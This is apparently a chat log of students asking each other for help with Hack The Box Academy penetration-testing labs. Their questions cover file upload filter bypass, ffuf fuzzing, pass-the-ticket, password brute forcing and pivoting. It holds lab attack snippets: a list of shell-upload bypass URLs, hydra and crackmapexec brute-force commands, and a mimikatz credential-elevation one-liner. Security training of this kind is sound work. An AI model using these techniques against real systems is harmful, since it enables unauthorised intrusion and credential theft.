I'm still a beginner at this but I can confirm that it's very interesting.
@limpid hemlock that's a kerberos credential cache file.
you'll need to perform a pass the ccache attack
it doesn't work like that
Ah
review this portion in the material Importing the ccache File into our Current Session and it explains how to do it
It's been a while, but your timezone correct?
i don't understand
that's also another thing i considered
when you create the instance of the machine, you have to set the timezone in the settings
i think 😕
I think not 😉
ah maybe
I look and I tell you
I got it people when smbclient and getting flag the command put it in double quotes
great job
Nah, just means you learned a valuable lesson 😂
i bet you will remember it next time 🙂
if your subscription isn't active are you still able to run the VM's for the modules you purchased?
yes
Are you wanting to take an exam or do one of the job paths? If so just follow them in order. If you just want to do the modules just because, my favorite so far was the Active Directory Enumeration & Attacks.
Yess life lesson learned
I'm just wondering what everyone's favorite module is so far that's all. i think the adcs module was a great presentation and delivery of the content
i thought about cme, but it's not being developed anymore instead of netexec. i wonder if they'll update it
i'm guessing the same commands apply to netexec though
I still need to try out nxc. I just try to use the tools the modules recommend so I got to spend like 45 mins trying to successfully install CME
i thought cme was native in kali
I'm using parrot security. I have to run it via poetry
the netexec folks have an easy way to install it, at least it works for me for the time being
For file upload module I am understanding how to brute force the extensions to see which allow for upload, however as the course says not all extensions will allow for code execution. Is there a better way to do it than just going through the list 1 by 1?
The Attacking Thick Clients Module Lab is absolute trash... On hour number 7, and my problem isnt the instruction, it's the slowness of the VM and the behavior of the machine that causes issues and making me reset 3 to 4 times an hour
:❤️
welcome friend
wrap the password in single quotes
Well that worked. I don't remember having to do that before
because $$ is a special variable in bash
without escaping it won't get passed correctly in the terminal
Rule of thumb: if there is a special character in the password it's best to wrap it in single quotes, just in case
I'll keep that in mind. Wish they'd mentioned that lol
hi guys, im on the file filters section of the file upload module of htb academy: https://academy.hackthebox.com/module/136/section/1290
i am stuck on the flag: The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"
i've tried all the previously mentioned tasks: blacklist, whitelist, content type, mime type
after dumping the wanted data from intruder i was left with the working extensions not mentioned in the blacklist:
pht
phar
pgif
phtml
phtm
working content-type:
image/gif
image/jpeg
image/jpg
image/png
Character Injection:
%20
%0a
%00
%0d0a
\x00
/
.\
.
…
:
I fuzzed every valid output (extension, filter bypass, etc…) using ffuf and intruder and got the following urls in order to retrieve the working payload that would only give me the executed PHP hello. i was left with the following list of "working payloads"; i used curl in order to see which uploaded payload worked, but they did not execute the command itself
─[eu-academy-1]─[10.10.15.88]─[htb-ac-559209@htb-30pzvfozfr]─[~]
└──╼ [★]$ cat final2
http://94.237.54.75:58290/profile_images/shell.gif.phps.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps%0D0a.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps%0A.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps%20.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps/.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps.//.gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps..gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps….gif.phps
http://94.237.54.75:58290/profile_images/shell.gif.phps:.gif.phps
http://94.237.54.75:58290/profile_images/shell.pht.gif
<..SNIP..>
?
@minor dome keep this channel relevant please
well i'm asking about the modules
For greater legibility, you can wrap sections of command/shell output in backticks
print("This is an example of syntax highlighting using markdown notation")
```
you can wrap stuff in a giant code block like this
```
So I did the first part of the pass the ticket attack and it successfully imported the ticket with Rubeus. Now I'm trying to do the powershell remoting and getting this error.
difference between x86 and x64
||phar|| will execute
It only gives me the one unfortunately. Am I just supposed to use mimikatz exclusively on this even though the module teaches Rubeus?
It was already there. Password Attacks > Pass the Ticket from Windows
I know it was already in the auth.txt whitelist (pic1) thanks anyway
Im not sure i got it.. can you be a little more specific pls
he says about your text, to format it
Yeh, it would just be easier to read if it had formatting
tried running as admin or resetting? works for me
I ended up just using minikatz to solve it but I'll probably go back again to try Rubeus later
Hi i finished the cpts path, do you guys have any tip, suggestion for preparing the exam?
Also just any suggestion to the exam.itself 😄
Is it more clear now ?
Thank you
Tons better 😄
Add the domainnames to your hosts file maybe
I think they're trying to make the owner of the file as root by using cp but it didn't work for I had to manually change the user and group. Then I was able to get the root shell
Is anyone else facing lag while using the labs in linux privesc module?
guys i need help
i'm doing DNS enumeration with python
i completed the entire module but I still can reach the first answer, I miss only this one
"Investigate all records for the domain “inlanefreight.com” with the help of dig or nslookup and submit the one unique record in double quotes as the answer"
pls help me
i must be stupid. because im looking at the vhost section of the info gather module and how they find the hosts does not make sense
im using the NAMELIST.TXT from seclists but i dont get how im supposed to verify 150k urls when they all come back as a 200 response when pointing to the inlanefreight.htb and its ip via ffuf
even doing the fuzzing command and its looping thru the response codes and url but doesnt confirm that any were successful
i literally looked at a guide on how they got the flags and nothing tells me how they were able to find the subdirs
did you filter the results?
then you are prolly doing it wrong.
you filter out the results that are definitely incorrect
he is getting every result as valid
but iirc the info gathering module doesnt even cover ffuf yet. but maybe im misremembering or there was an update since I did it
Yes, thats why you filter lol
so it doesnt do that
filtering by response code doesnt work. but typically something like byte length would
yeah file size
it covers it
rad your image even includes the filter
sorting -fc 200 gives me no results
why are you using fc
filter by file size
use a different filter
I am trying to connect to the MSSQL from the pwnbox. For some reason it is not working. Machine is able to be pinged, ran nmap confirming open ports. here is my syntax on the sqsh command:
sqsh -S 10.129.111.98 -U htbdbuser -P 'MSSQLAccess01!' -h
their example is using size
99% of the time you use ffuf you want to filter by size
look at the size of your false positives
you dont just follow the module blindly
thats what you want to filter by
^
i thought that was the point
lol no
so i sort by 10918
no that was just an example
academy hates blind copying
and this is response
sqsh -S 10.129.203.12 -U htbdbuser -P 'MSSQLAccess01!' -h
sqsh-3.0 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Open Client Message
Layer 6, Origin 8, Severity 5, Number 3
ct_connect(): directory service layer: internal directory control layer error:
Requested server name not found.
true that lol
some sections you can blind copy. but assessments never
had to teach my friend that
okay so i have to sort by the false then to get them to not show up
granted he still is in high school
pretty much
I'm in the Password Attacks in Network and Services on question 2.
Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
I found the flag. Copy pasted it into the answer box. But says it's wrong. Is it possible to encounter "fake" flags in Academy? Feels a bit misleading.
you find the common denominator amongst the false positives and then filter by that value
sometimes thats status code. sometimes thats file size, sometimes is something crazy more esoteric that needs a custom processing module
false positive. i just had to resubmit it 3-4 times and then it worked 
usually an accidental space or such sadge
Yeah, I think that might be it. Got tilted for a second xd
I love academy but its a weird oddity. Every other platform strips extraneous whitespace before evaluating lol
Hahaha, yeah. I've encountered some weird things the past few weeks
Part of the experience I guess
Did you try both auth methods?
you mean mssql and mysql?
No, there are two types of auth methods in mssql
it's always important to get syntax right, whitespaces, etc. imagine high level/pressure pentests where one typo mistake could crash the app you're testing preventing you from accessing it again etc. i can only imagine how meticulous it has to be.
let me try the other one I think I know what you are talking about
in the Password Attacks Lab - Hard
should i use rockyou.txt, mut_password.lis, password.list to brute force the user johanna via smb
used impacket. It worked
mutated I think.
I am doing the Pivot-module. I'm on the double pivot part.
I've made it onto the DC (172.16.5.19) from which I have to pivot onto "jason" (172.16.6.155). But I cant even reach 172.16.6.155 from the DC with ping or RDP there.
(Im using ligolo but thats besides the point). Any ideas?
you mean impacket-smbclient ?
That’s a different question
im talking about brute forcing smb i'm currently doing it using crackmapexec with the mut_password.list
its been a while and still got nothing
It takes a little while
those password sections can take about 1hr and more
yeah sometimes they even take days and you still get nothing
hurry up and wait 
get fast being slow :>
I'm doing question 3 in Password Attacks; Network and Services.
If I've been enumerating a username:password for over 15 min with a username list and password list from HTB. Does it usually take so long? I'm just starting to wonder if I'm doing something wrong.
serious ?
this is no CTF 😉
What’s your command
crackmapexec rdp 10.129.202.136 -u username.list -p password.list
hydra did not work ?
Nope, been going for a long time as well
It should work
and way faster then cme
finished brute forcing and got nothing i'll try hydra next
I'm a huge noobie at password attacks. So this might be a stupid question. Is it a issue to run Hydra and Crackmap the same time?
yeah don't use cme for bruting in general
^ Unless password spray.
nah even then it's too slow, either use the ldap proto or kerbrute
ldap proto ?
hydra been going at it for approx. 20 min. Is this syntax ok?
hydra -L username.list -P password.list rdp://10.129.42.197
seems ok to me
nxc ldap is way faster than the other protocols, use with --users and it's pretty obvious in a big domain
Anyone who finished the Command Injection Skill Assessment who I can ask a question to?
Hmm okay, pretty weird it hasn't hit anything yet. Can it maybe be because I run crackmap and Hydra at the same time?
proto = protocol 😄
yeah running two brute force attacks at the same time can result in false results at least for me i used to do in mutation password section and kept getting no results i learnt it the hard way after a week of brute forcing
i am at the first pages of the module
Okay, thanks a lot. I'll try running hydra alone 🙂
Can anyone offer a little guidance on the web enumeration module? feel a little lost, I've tried getting some information by grabbing the website banner as well as listing potential directories but they both feel like dead ends, apologies if this is too generic of a question
you checked robots.txt
yeah and there was one disallowed file
check that path
so anyone can help me?
Was able to get it to work but thanks!
anyone ?
doesnt curling the robot.txt just give you the file and not the path, I dont really see a path here but I think I'm missing something
can i send you a DM ?
Sure
yeee boii
n1
guys is it normal that if i use mimikatz on evil-winrm session it glitches?
run it in non interactive mode
like .\mimikatz.exe "privilege::debug" "token::elevate" "<command here>" "exit"
smb isn't giving any results while brute forcing from crackmapexec then from hydra, now trying rdp from hydra, hopefully it works
its works but its a bit uncomfortable ;\
wdym? just run the command and get the info you need, if you want something else, run it again
i cannot see suggestions
what suggestions
Can I DM someone about the Advanced XSS and CSRF skill assessment?
got rdp creds
ah no nothing i was talking about the module list, i thought i couldnt see it
Guys, have you ever faced this problem while solving Linux PrivEsc module, logrotate task?
looks like the problem with HTB's machine idk
git clone in your own vm, the target doesn't have internet access